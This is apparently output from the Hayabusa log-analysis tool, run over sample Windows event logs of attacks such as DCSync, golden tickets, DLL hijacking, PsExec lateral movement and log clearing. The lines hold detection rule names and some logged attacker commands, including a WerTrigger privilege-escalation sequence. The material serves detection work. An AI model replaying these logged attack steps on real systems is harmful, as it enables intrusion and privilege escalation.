3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54933 : LogonID: 0x11b9e9d3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54932 : LogonID: 0x11b9e9e5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55750 : LogonID: 0x11b9ea1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.566 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: FS02$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: MSSQL01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-03 01:24:07.551 +09:00,MSEDGEWIN10,7,high,Fax Service DLL Search Order Hijack,,rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:07.558 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx +2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat""""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wermgr.exe -upload",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: hack-admu-test1 : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:17.039 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:35.319 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: JUMP01$ : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: not_existing_user : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx +2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx +2020-08-21 00:41:58.884 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: not_existing_user : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b90e2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b9a72,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50380 : LogonID: 0x119b9a8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50381 : LogonID: 0x119b9aa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50382 : LogonID: 0x119b9ab2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50317 : LogonID: 0x119b9b27,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b9e04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50380 : LogonID: 0x119ba401,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50381 : LogonID: 0x119ba414,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50382 : LogonID: 0x119ba427,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\PSEXESVC.exe : Path: C:\Windows\PSEXESVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: 04246W-WIN10 : IP Address: 172.16.66.142 : Port: 60726 : LogonID: 0x21a8c68,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: - : IP Address: 172.16.66.142 : Port: 60728 : LogonID: 0x21a8c80,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: - : IP Address: 172.16.66.142 : Port: 60726 : LogonID: 0x21a8c9a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,Logon Failure - Wrong Password,User: IEUser : Type: 2 : Workstation: MSEDGEWIN10 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx +2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: MSEDGEWIN10 : IP Address: - : Port: - : LogonID: 0x1cd8f6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx +2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: MSEDGEWIN10 : IP Address: - : Port: - : LogonID: 0x1cd964 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx +2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx +2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by 